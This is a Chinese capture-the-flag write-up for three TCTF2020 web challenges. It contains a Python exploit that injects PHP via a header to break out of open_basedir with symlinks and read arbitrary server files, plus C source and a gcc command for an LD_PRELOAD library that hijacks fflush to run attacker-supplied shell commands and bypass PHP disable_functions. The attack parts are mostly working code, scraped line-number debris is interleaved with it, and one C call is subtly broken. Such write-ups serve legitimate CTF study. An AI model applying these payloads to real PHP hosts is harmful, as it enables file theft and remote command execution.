TCTF2020
# TCTF2020
# Cloud Computing
symlink绕过open_basedir
payload
def exploit(f):
print f
payload="""
error_reporting(E_ALL);
mkdir('{4}{0}/b/c/d/e/f/g/',0777,TRUE);symlink('{4}{0}/b/c/d/e/f/g','{4}{1}');
ini_set('open_basedir','{4}:{4}{2}/');
symlink('{4}{1}/../../../../../../','{4}{2}');
unlink('{4}{1}');
echo base64_encode(file_get_contents('{4}{2}{3}'));
""".format(randomstr(),randomstr(),randomstr(),f,"/var/www/html/sandbox/f700deb7a6e26f106e3103e6257bb68a75a1a5f3/")
poc= payload.replace("\n",'')
#print poc
headers = {
"eki":poc
}
req=requests.get(url1,headers=headers)
print req.text
if "failed to open stream" not in req.text:
try:
retf = open(f.replace("/",'')+"1","wb")
retf.write(base64.b64decode(req.text))
retf.close()
except:
print "error"
pass
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Cloud Computing V2
这里把/flag ban了,没想到要内网渗透....
file_get_contents支持http协议
# Wallbreak Easy
Imagick is a awesome library for hackers to break `disable_functions`.
So I installed php-imagick in the server, opened a `backdoor` for you.
Let's try to execute `/readflag` to get the flag.
1
2
3
2
3
题目要求绕过disabled_function而且提到了php-imagick预期是利用这个扩展来bypass
#include <stdlib.h>
#include <string.h>
void payload() {
const char* cmd = getenv('CMD');
system(cmd);
}
int fflush() {
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
生成so文件
gcc -fPIC -shared hack1.c -o hack1.so
1
# 参考资料
TCTF2019 WallBreaker-Easy 解题分析:https://xz.aliyun.com/t/4688#toc-5
编辑 (opens new window)
上次更新: 2022/05/18, 16:49:51
